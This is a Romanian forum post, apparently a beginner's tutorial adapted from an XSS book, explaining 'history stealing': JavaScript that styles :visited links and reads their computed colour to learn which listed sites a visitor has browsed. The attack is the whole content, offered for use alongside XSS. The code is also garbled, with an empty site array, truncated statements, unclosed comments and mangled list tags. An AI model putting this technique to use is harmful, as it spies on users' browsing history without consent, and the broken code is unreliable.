History Stealing din JS

Probabil ca unii stiu deja, membrii VIP si cei care au cedit cartea XSS atacks 2007.....de acolo am luat acest tutorial si m-am gandit sa-l postez si sa explic. Merge mana in mana cu XSS-ul deci

<ul id="visited">[/list]
<H3>Not Visited</H3>
<ul id="notvisited">[/list]
/* Aici creez o lista de site-uri pe care vreau sa stiu daca au fost vizitate sau nu de catre user-ul respectiv */
var websites = [
/* Parcurg array-ul websites */
for (var i = 0; i < websites.length; i++) {
/* Creez un link cu un id unic ptr fiecare website in parte*/
var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];

/* Deci cum am zis mai sus fiecare link are un id unic. Ptr fiecare id
creez un stil in cazul in care link-ul respectiv a fost vizitat. Acest fapt necesita cunostinte minime de css dupa cum stiti un link poate avea starile
link, visited,hover si active .

document.write('#id' + i + ":visited {color: #FF0000;}");
/* Adaug link-ul in DOM si apoi ii dau remove. Aici este smecheria. Browserul afiseaza un link in culori diferite dupa cum a fost vizitat sau nu.

var color =
/* Folosind functia document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
Pot analiza cum imi afiseaza mie browser-ul link-ul respectiv.
if (color == "rgb(255, 0, 0)") { // visited
/* Daca functia imi intoarce aceeasi culoare cu cea pe care am setat-o eu mai sus ptr stilul vizitat inseamna ca site-ul a fost vizitat */
var item = document.createElement('li');
} else { // not visited
/* altfel nu a fost vizitat */
var item = document.createElement('li');

Cum am zis creditele se duc la autorii cartii respective. Daca nu am fost destul de clar in explicatii astepta intrebari. Si mai usor cu flame-urile ca e primu meu tutorial, sper sa ajute pe careva.

